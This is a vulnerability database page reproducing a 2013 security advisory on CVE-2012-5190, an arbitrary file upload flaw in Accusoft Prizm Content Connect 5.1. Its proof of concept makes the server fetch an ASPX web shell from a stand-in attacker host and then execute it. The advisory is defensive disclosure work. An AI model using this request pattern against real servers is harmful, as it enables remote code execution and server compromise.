Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28956
HistoryJan 14, 2013 - 12:00 a.m.

Arbitrary File Upload and Code Execution in Accusoft Prizm Content Connect

2013-01-1400:00:00
vulners.com
45
JSON

In the course of our security assessment consulting we often find 0day
vulnerabilities and report them to vendors. In this particular case
the vendor has unfortunately shown a general disregard for the
security risk of this uncovered vulnerability which was originally
disclosed privately to them on September 27th 2012. All original
deadlines and even their own proposed fix dates have expired, as such
we're releasing this advisory so that affected customers can update
their WAF/IDS/IPS systems to protect themselves from this obvious
vulnerability. We hope the Accusoft team addresses this vulnerability
in a patch or upcoming release as soon as possible. This vulnerability
has been assigned CVE-2012-5190.

Take care,

Include Security Research Team

Arbitrary File Upload and Execution in Prizm Content Connect default.aspx

Prizm Content Connect web document viewer converts a variety of
formats into Adobe Flash objects so that they can be viewed in a web
browser. If Prizm Content Connect is configured according to the
installation instructions, it will be vulnerable to arbitrary remote
code execution.

By default, the Prizm software includes a script called default.aspx
which will accept a document parameter that is a remote URL. This
script will download the remote document, save it to the server with
an attacker-supplied filename extension, and reveal the path to the
document on the local filesystem.

Since, in the default configuration, the download path on the local
filesystem resides within the web server’s web root, the attacker can
cause default.aspx to download a malicious ASPX script and save it
with a dangerous .aspx extension. The attacker can then request the
ASPX script from the server, causing the server to execute possibly
malicious code contained within.
Vulnerable versions

This vulnerability was discovered in the following version, but we
anticipate other versions to be vulnerable as well:
*Prizm Content Connect 5.1

Proof of concept

First, the attacker causes the Prizm Content Connect software to
download the malicious ASPX file:

http://victim.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx

The resulting page discloses the filename to which the ASPX file was
downloaded, e.g.:

Document Location: C:\Project\

Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx

Temp Location: C:\tempcache\

The attacker then requests the ASPX shell from the root of the website:

http://victim.example.com/ajwyfw45itxwys45fgzomrmv.aspx

Assigned CVE# CVE-2012-5190

Related

prion 1
nessus 1
packetstorm 1
cve 1
securityvulns 1
prion
prion
Privilege escalation
2020-01-21 16:15:00
nessus
nessus
Prizm Content Connect default.aspx document Parameter Remote File Inclusion
2013-02-19 00:00:00
packetstorm
packetstorm
Prizm Content Connect Code Execution
2013-01-11 00:00:00
cve
cve
CVE-2012-5190
2020-01-21 16:15:00
securityvulns
securityvulns
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2013-01-14 00:00:00
JSON
Related for SECURITYVULNS:DOC:28956
prion1nessus1packetstorm1cve1securityvulns1